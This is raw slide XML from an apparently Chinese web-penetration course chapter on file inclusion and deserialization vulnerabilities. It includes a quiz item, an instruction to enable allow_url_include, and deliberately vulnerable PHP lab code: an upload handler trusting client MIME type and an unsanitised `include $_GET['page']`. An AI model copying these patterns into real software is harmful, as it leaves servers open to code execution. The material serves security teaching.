              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{32BF82D2-7A68-459D-A996-9BDDA2518FA4}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2019/12/12</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4259461" y="6703595"/>
            <a:ext cx="4339828" cy="385072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1266">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081492" y="6703595"/>
            <a:ext cx="2893219" cy="385072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1266">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1p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1336246420"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483872" r:id="rId1"/>
    <p:sldLayoutId id="2147483873"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64326"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082" indent="-241082" algn="l" defTabSz="964326" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1055"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2953"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4326" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1898" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="482163" algn="l" defTabSz="964326" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1898" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="964326" algn="l" defTabSz="964326" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1898" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1446489" algn="l" defTabSz="964326" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1898" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1928652" algn="l" defTabSz="964326" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1898" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2410816" algn="l" defTabSz="964326" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1898" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2892979" algn="l" defTabSz="964326" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1898" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3375142" algn="l" defTabSz="964326" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1898" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3857305" algn="l" defTabSz="964326" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1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slideLayout" Target="../slideLayouts/slideLayout2.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image" Target="../media/image5.tmp"/><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30755" y="34486"/>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1964879" y="880021"/>
            <a:ext cx="10657184" cy="2616101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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第十章   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" b="1"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实战进阶</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400" b="1"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知识点一：文件包含漏洞</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知识点二：反序列化漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293770524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285875" y="635000"/>
            <a:ext cx="10287000" cy="2260203"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square"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不属于文件包含漏洞的是</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2571750" y="2938264"/>
            <a:ext cx="9001125" cy="678061"/>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包含日志文件</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2571750" y="3842345"/>
            <a:ext cx="9001125" cy="678061"/>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包含上传的合法文件</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2571750" y="4746427"/>
            <a:ext cx="9001125" cy="678061"/>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包含远端</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URL</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指定的资源</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2571750" y="5650508"/>
            <a:ext cx="9001125" cy="678061"/>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包含用作数据库连接的公用文件</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椭圆 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1657588" y="3006070"/>
            <a:ext cx="542449" cy="542449"/>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1657588" y="3910151"/>
            <a:ext cx="542449" cy="542449"/>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1657588" y="4814233"/>
            <a:ext cx="542449" cy="542448"/>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1657588" y="5718314"/>
            <a:ext cx="542449" cy="542448"/>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9403080" y="6554589"/>
            <a:ext cx="1627347" cy="433959"/>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12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12858750" cy="635000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12858750" cy="635000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TitleBackground"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId14"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1285875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1309350" y="63500"/>
            <a:ext cx="1422400" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130776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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{DF16C0EE-F047-4513-ABE9-3621ABC453F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100783" y="816086"/>
            <a:ext cx="10297144" cy="423975"/>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000" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>php-apache2handler.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>allow_url_include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="20" name="表格 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF644E90-D856-4FCD-B616-F866C815904E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3702055040"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1316807" y="1312069"/>
          <a:ext cx="10153128" cy="5876967"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10153128">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="5328592">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>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&lt;form action="" </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="18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enctype</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="multipart/form-data" method="post" </a:t>
                      </a:r>
                    </a:p>
                    <a:p>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name="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="18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uploadfile</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"&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" alt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上传文件：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN"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input type="file" name="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="18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upfile</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/&gt;&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="18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br</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&gt; </a:t>
                      </a:r>
                    </a:p>
                    <a:p>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&lt;input type="submit" value="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" alt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上传</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN"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/&gt;&lt;/</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form&gt; </a:t>
                      </a:r>
                    </a:p>
                    <a:p>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sz="18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php</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if( </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">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is_uploaded_file</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($_FILES['</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="18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upfile</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18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tmp_name</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18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upfile</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=$_FILES["</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="18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upfile</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获取数组里面的值 </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN"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name=$</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="18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upfile</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["name"];//</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" alt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上传文件的文件名 </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN"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type=$</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="18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upfile</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["type"];//</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" alt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上传文件的类型 </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN"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size=$</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="18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upfile</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["size"];//</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" alt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上传文件的大小 </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN"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18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tmp_name</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18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upfile</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18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tmp_name</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上传文件的临时存放路径 </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" alt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1800" b="1" kern="1200" dirty="0"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pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>if((</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>$type=="image/jpeg")&amp;&amp;($size&lt;100000</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)){</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0"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把上传的临时文件移动到</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" alt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目录下面 </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="2"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">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move_uploaded_file</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18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tmp_name,'up</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/'.$name); </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="2"/>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$destination="up/".$name;  </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="2"/>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echo $destination</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0"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p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0"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}else{</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0"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echo "error file type.";</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0"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?&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="86402" marR="86402" marT="43201" marB="43201">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="组合 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{13E81921-4694-4FCE-BEEB-D82105CA8807}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5421263" y="231949"/>
            <a:ext cx="2016224" cy="474140"/>
            <a:chOff x="5747023" y="837929"/>
            <a:chExt cx="1364703" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{F32E12F4-9770-4CBB-86DA-6F7C3B2F93C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5747023" y="1312069"/>
              <a:ext cx="1364703"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xmlns="" id="{61E0A855-E6B3-407D-A621-CDD4F16176C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6054395" y="837929"/>
              <a:ext cx="749959"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实验一</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR"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1285323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3E81921-4694-4FCE-BEEB-D82105CA8807}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5421264" y="519981"/>
            <a:ext cx="2016224" cy="474140"/>
            <a:chOff x="5747023" y="837929"/>
            <a:chExt cx="1364703" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{F32E12F4-9770-4CBB-86DA-6F7C3B2F93C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5747023" y="1312069"/>
              <a:ext cx="1364703"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xmlns="" id="{61E0A855-E6B3-407D-A621-CDD4F16176C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6054395" y="837929"/>
              <a:ext cx="749959"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实验一</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR"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 name="组合 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{E1BFEC09-C411-4C8D-A681-0E601F34CB12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1100783" y="1384078"/>
            <a:ext cx="10873208" cy="1512167"/>
            <a:chOff x="2468935" y="3335160"/>
            <a:chExt cx="7848872" cy="3607969"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="矩形 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{00F0C464-4B74-4C62-A523-8B32ECC5EBC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861378" y="3533003"/>
              <a:ext cx="7144552" cy="2561438"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="0" dirty="0" err="1"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a.php</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="20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defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="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20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p>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pP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include $_GET['page']; //The page we wish to display   </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pP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 </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="矩形: 圆角 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{49E36080-6564-45C2-B1A1-99CA69B89C25}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2468935" y="3335160"/>
              <a:ext cx="7848872" cy="3607969"/>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0" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{CE433DB7-B9A2-4467-B04E-5F8D58C0E38A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100783" y="3017805"/>
            <a:ext cx="11233248" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0" smtClean="0">
